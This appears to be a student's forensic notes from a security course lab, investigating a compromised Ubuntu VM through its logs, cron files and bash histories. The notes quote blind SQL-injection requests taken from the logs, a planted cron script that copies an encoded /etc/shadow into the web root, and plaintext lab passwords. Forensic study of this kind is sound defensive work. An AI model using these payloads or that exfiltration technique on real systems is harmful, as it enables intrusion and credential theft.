
	ssh arnold@192.168.111.129
	password: csc347GreatStuff!

	/usr/lib/tripwire
	/usr/share/doc/tripwire
	/usr/share/doc/tripwire

	logs:
	https://superuser.com/questions/565927/differences-in-var-log-syslog-dmesg-messages-log-files

	ls /var/log
	journalctl -u network.service # network service
	journalctl -u ssh.service # ssh

	all in:
	cd /var/log
	/var/log/messages : General message and system related stuff
	 /var/log/auth.log : Authenication logs
	 /var/log/kern.log : Kernel logs
	 /var/log/cron.log : Crond logs (cron job)
	 /var/log/maillog : Mail server logs
	 /var/log/httpd/ : Apache access and error logs directory
	 /var/log/apache2/ : Apache access and error logs directory
	 /var/log/boot.log : System boot log
	 /var/log/secure or /var/log/auth.log : Authentication log
	 /var/log/utmp or /var/log/wtmp : Login records file
 # see last command

	 /var/log/faillog
 # see faillog command


# grep out all of my commands to see attackers
 sed '/Nov 17/d' /var/log/messages

 netstat -tulpn | grep LISTEN
 sudo cat /var/log/postgresql/postgresql-8.3-main.log > log_postregsql.txt
 cat /var/log/apache2/error.log > log_apache2_error.txt
 sed '/Nov 17/d' /var/log/messages > general_attacker_logs.txt
 cat /var/log/auth.log > log_auth.txt
 cat /var/log/kern.log > log_kernel.txt
 cat /var/log/mail.log > log_mail.txt
 cat /var/log/user.log > log_messages_about_all_user_level_logs.txt
 last > login_history.txt
 lastb > bad_logins.txt
 history > bash_history.txt
 stat ~/.bash_history > bash_history_modification_and_creation.txt
 lastlog > log_last_logins.txt
 cat /var/log/apache2/access.log > log_apache2_access.txt
 cat /var/log/apache2/error.log > log_apache2_error.txt
 sudo cat ~/.bash_history > arnold_bash_history.txt


bill:
	sudo ls -R -al /home/bill > all_files.txt
	sudo cat /home/bill/.bash_history > bill_bash_history.txt


charlie:
	sudo ls -R -al /home/charlie > all_files.txt

sudoers:
	sudo cat /etc/sudoers > sudoers
	grep '^admin:' /etc/group > all_sudoers.txt
	sudo cat /home/charlie/.ssh/authorized_keys > charlie_authorized_keys


to copy into kali:
scp -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes256-cbc arnold@192.168.111.129:a3.zip .


how do i get the password when:
gpg --decrypt /home/bill/myPrivateFiles

strange behavioure
Nov 10 08:38:35 ubuntuA3 su[14993]: Successful su for arnold by bill
Nov 10 08:38:35 ubuntuA3 su[14993]: + pts/1 bill:arnold

strange postgres behaviour
2020-11-10 18:33:58 EST STATEMENT:  select * from account where username like bill

2020-11-11 12:52:38 EST ERROR:  syntax error at or near "something" at character 81
2020-11-11 12:52:38 EST STATEMENT:  SELECT id, username, firstName, lastName, passwd FROM account WHERE username='' something ' AND passwd=''
2020-11-11 12:52:38 EST ERROR:  unnamed prepared statement does not exist
2020-11-11 12:54:09 EST ERROR:  unterminated quoted string at or near "' AND passwd=''" at character 89
2020-11-11 12:54:09 EST STATEMENT:  SELECT id, username, firstName, lastName, passwd FROM account WHERE username=' ' OR 1=1;' AND passwd=''
2020-11-11 12:54:09 EST ERROR:  unnamed prepared statement does not exist
2020-11-11 13:06:21 EST ERROR:  syntax error at or near "something" at character 44
2020-11-11 13:06:21 EST STATEMENT:  SELECT * FROM solution WHERE expression='' something --'
2020-11-11 13:06:21 EST ERROR:  unnamed prepared statement does not exist
2020-11-11 13:06:21 EST ERROR:  syntax error at or near "something" at character 67
2020-11-11 13:06:21 EST STATEMENT:  insert into solution (value, expression, accountId) values (3, '' something --', 1)


strange apache behavioure:
172.16.107.140 - - [11/Nov/2020:13:19:28 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27bill%25%27+and+passwd+like+%27%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 65442 "-" "Python-urllib/3.8"
172.16.107.140 - - [11/Nov/2020:13:19:28 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27billa%25%27+and+passwd+like+%27%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 590 "-" "Python-urllib/3.8"
172.16.107.140 - - [11/Nov/2020:13:19:28 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27billb%25%27+and+passwd+like+%27%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 590 "-" "Python-urllib/3.8"


who is logged in at this time?
bill     pts/0        172.16.107.140   Wed Nov 11 13:24 - 14:18  (00:53)

so bill, or an attacker impersonating him logged in and ran sql injections on four fours
http://192.168.111.129/fourFours/index.php

notes from oh:
		logged into fourfours without any credentials

		- hints for logs:
			- grep
			- find (when things change )


grep:
	sudo grep "2020-11-11"  postgresql/postgresql-8.3-main.log


bill's passwd:
billGatesIsGreat


find all files newer than mark.start and older than mark.end

		touch /home/arnold/mark.start -d "2020-11-11 00:00"
		touch /home/arnold/mark.end -d "2020-11-12 00:00"
		sudo find / -newer /home/arnold/mark.start ! -newer /home/arnold/mark.end

		or
		touch /home/arnold/mark.start -d "2020-11-11 00:00"
		touch /home/arnold/mark.end -d "2020-11-14 00:00"
		sudo find / -newer /home/arnold/mark.start ! -newer /home/arnold/mark.end -exec ls -l {} \;| grep "2020-11-11"

grep for when bill signed into fourFours:
 		grep "billGatesIsGreat%" /var/log/apache2/access.log


one of the files made on nov 11 is a cronjob file. The cronjob makes charlie admin:
		sudo cat /var/spool/cron/atjobs/a00001019882c9

		sudo stat /var/spool/cron/atjobs/a00001019882c9

				File: `/var/spool/cron/atjobs/a00001019882c9'
		Size: 2187            Blocks: 8          IO Block: 4096   regular file
		Device: 801h/2049d      Inode: 173476      Links: 1
		Access: (0700/-rwx------)  Uid: (    0/    root)   Gid: (    1/  daemon)
		Access: 2020-11-19 00:33:17.000000000 -0500
		Modify: 2020-11-11 13:49:54.000000000 -0500
		Change: 2020-11-11 13:49:54.000000000 -0500

		So was made by attacker

another file attacker modified:
	/etc/cron.hourly/backup
	cat backup

	#!/bin/bash
	/bin/cat /etc/shadow | /usr/bin/tr '[A-Za-z:]' '[N-ZA-Mn-za-m.]' > /var/www/fourFours/.sh
	/bin/cat /etc/passwd | /usr/bin/tr '[A-Za-z:]' '[N-ZA-Mn-za-m.]' > /var/www/fourFours/.pa

questions:
	how did attacker get charlie?


broken fourFours accounts:
		cat apache2/access.log | grep "lion%"
		172.16.107.140 - - [11/Nov/2020:13:19:27 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27anne%25%27+and+passwd+like+%27lion%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 65788 "-" "Python-urllib/3.8"

		cat apache2/access.log | grep "fourfivesix%"
		172.16.107.140 - - [11/Nov/2020:13:19:49 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27lindah20%25%27+and+passwd+like+%27fourfivesix%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 65443 "-" "Python-urllib/3.8"

		cat apache2/access.log | grep "password1%"
		172.16.107.140 - - [11/Nov/2020:13:19:53 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27matchstick%25%27+and+passwd+like+%27password1%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 65444 "-" "Python-urllib/3.8"

		cat apache2/access.log | grep "passw0rd%"
		172.16.107.140 - - [11/Nov/2020:13:20:01 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27ssll%25%27+and+passwd+like+%27passw0rd%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 65443 "-" "Python-urllib/3.8"

		cat apache2/access.log | grep "passwd+like+%27cliff%"
		172.16.107.140 - - [11/Nov/2020:13:19:32 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27cliff%25%27+and+passwd+like+%27cliff%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 65674 "-" "Python-urllib/3.8"

		cat apache2/access.log | grep "passwd+like+%27perl%"
		172.16.107.140 - - [11/Nov/2020:13:19:56 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27perl%25%27+and+passwd+like+%27perl%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 65542 "-" "Python-urllib/3.8"

		cat apache2/access.log | grep "jbh%"
		172.16.107.140 - - [11/Nov/2020:13:19:41 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27hotel%25%27+and+passwd+like+%27jbh%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 65542 "-" "Python-urllib/3.8"

		cat apache2/access.log | grep "esrever%"
		172.16.107.140 - - [11/Nov/2020:13:19:35 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27dk%25%27+and+passwd+like+%27esrever%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 65544 "-" "Python-urllib/3.8"

		cat apache2/access.log | grep "badPassword%"
		172.16.107.140 - - [11/Nov/2020:13:19:38 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27eightball%25%27+and+passwd+like+%27badPassword%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 65544 "-" "Python-urllib/3.8"

		cat apache2/access.log | grep "grant%"
		172.16.107.140 - - [11/Nov/2020:13:19:43 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27ivanna%25%27+and+passwd+like+%27grant%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 65545 "-" "Python-urllib/3.8"

		grep "billGatesIsGreat%" /var/log/apache2/access.log
		172.16.107.140 - - [11/Nov/2020:13:19:31 -0500] "GET /fourFours/index.php?user=%27+or+%28username+like+%27bill%25%27+and+passwd+like+%27billGatesIsGreat%25%27%29%3B+--&password=&operation=login HTTP/1.1" 200 65442 "-" "Python-urllib/3.8"

attacker made changes :
	/var/www/fourFours/.sh

		- stat /var/www/fourFours/.sh
		- access is at 2020-11-11 13:43
		- since this is part of a cron job we modify it too

grep "Nov 11" auth.log
	 we can see attacker attempting to login to the system with anne then bill


attacker gets root by:
	su <command>
		- so they can run commands as root

attacker gets charlie by:
	sudo ssh -i /home/charlie/.ssh/authorized_keys  charlie@localhost
